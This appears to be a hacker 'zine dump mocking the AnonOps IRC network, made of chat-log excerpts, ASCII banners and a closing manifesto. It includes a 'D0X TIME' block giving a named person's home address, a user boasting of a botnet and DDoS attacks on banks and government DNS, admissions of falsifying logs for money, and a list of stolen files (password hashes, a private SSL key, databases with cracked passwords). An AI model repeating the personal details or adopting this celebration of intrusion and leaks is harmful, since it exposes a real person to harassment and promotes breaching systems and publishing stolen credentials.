<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol 
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack? 
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed

@CalebNewz: somehow their hitting my ip table.
    _____      _____ _ __  
   / _ \ \ /\ / / _ \ '_ \ 
  | (_) \ V  V /  __/ | | |
   \___/ \_/\_/ \___|_| |_|
                           
						 
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2

            _           _____     __
      /\   | |         |__ \ \   / /
     /  \  | |__   __ _   ) \ \_/ / 
    / /\ \ | '_ \ / _` | / / \   /  
   / ____ \| | | | (_| |/ /_  | |   
  /_/    \_\_| |_|\__,_|____| |_|   
                                    
                                  
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
    it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
    so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it

    ____                       ____     _    _ _ 
   |  _ \ _____      _____ _ _|___ \   / \  | | |
   | |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
   |  __/ (_) \ V  V /  __/ |  / __/ / ___ \| | |
   |_|   \___/ \_/\_/ \___|_| |_____/_/   \_\_|_|
                                              
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
    leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
    
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
    is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
    That just smacks of gross negligence. Turn in your Guy Fawkes mask.
    
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
    the provider.
    
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.

                            _                 
     _ __ ___ _ __ ___  ___| | ___  ___ _ __  
    | '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \ 
    | | |  __/ | | | | \__ \ |  __/  __/ |_) |
    |_|  \___|_| |_| |_|___/_|\___|\___| .__/ 
                                       |_|

D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
    Names:          Rick Bonata
                    
    Address	    221 FRANKLIN AVE
                    CUYAHOGA FALLS, OH 44221
                    

<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario                             
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.

<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D

<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi

<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
    2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
    DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers

<remsleep> If the FBI does come, or whomever for whatever reason, I will have
    them on camera with a live feed with a 3G modem backup streaming to one of
    my VDSs. I would be unstopable after that, I would sue for false arrest,
    kidnapping, conspiracy to each, general fuckery as well as a large sum of
    punitive damages.

<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
    Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
    DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less. 
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
    [remsleep] Memo to ANY Law Enforcement: You are compelled to
    leave this network, failure to do so will result in whatever
    evidence obtained being after this point will become sealed
    and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
    notices attached to their servers

                        :: 0x07 ~ FiL3z ::

We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.

Filename            Description
shadow              /etc/shadow, self explanatory
oper.db             Anope Oper Database
chan.db             Anope Channel Database
nick.db             Anope NickServ Database
keys.txt            AnonOps private ssl key/cert
defaults.conf       InspIRCd Conf.
nick.out.txt        Human readable NickServ database w/ cracked passwords,
                    nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt        Huamn readable ChanServ database w/ cracked passwords,
                    access lists, akick lists, badwords, ..etc.
                    
                        :: 0x08 ~ exit ::
                        
tl;dr JAJA ANONOPS ESTAN MUERTO.   (LOL DEAD)                     

AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.

VIVA LA CARLOS1337!!!!!

shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
    for fighting the good fight.